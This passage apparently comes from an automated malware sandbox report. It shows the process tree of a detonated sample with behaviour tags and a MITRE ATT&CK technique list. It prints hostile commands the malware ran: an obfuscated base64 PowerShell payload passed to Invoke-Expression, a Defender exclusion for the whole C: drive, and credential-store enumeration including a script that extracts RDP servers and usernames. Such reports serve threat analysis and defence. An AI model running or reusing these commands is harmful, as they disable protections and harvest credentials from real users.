nhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        
        PID:7608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:8436
      - C:\Users\Admin\AppData\Local\Temp\10413470101\81bb507991.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413470101\81bb507991.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:10508
      - C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe"
        6⤵
        
        PID:8300
        
        C:\Users\Admin\Abspawnhlp.exe
        
        "C:\Users\Admin\Abspawnhlp.exe"
        7⤵
        
        PID:8560
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        8⤵
        
        PID:8700
      - C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe"
        6⤵
        
        PID:9116
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3864585960.txt\""
        7⤵
        
        PID:9068
        
        C:\Windows\system32\net.exe
        
        "net" statistics workstation
        7⤵
        
        PID:9696
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 statistics workstation
        8⤵
        
        PID:9752
        
        C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        7⤵
        
        PID:9948
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:11492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9636
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        8⤵
        
        PID:10392
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        
        PID:10072
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:10172
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        
        PID:10184
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        
        PID:10412
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        7⤵
        
        PID:10584
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        
        PID:10568
      - C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe"
        6⤵
        
        PID:10288
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:10468

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2944

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6096

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3500 -ip 3500
1⤵
PID:7368

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{6933409c-556c-44b7-9ee7-3107cb88c22e}\ab0586cb-62cb-46a3-b62a-7725723fe744.cmd"1!
1⤵
PID:5700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion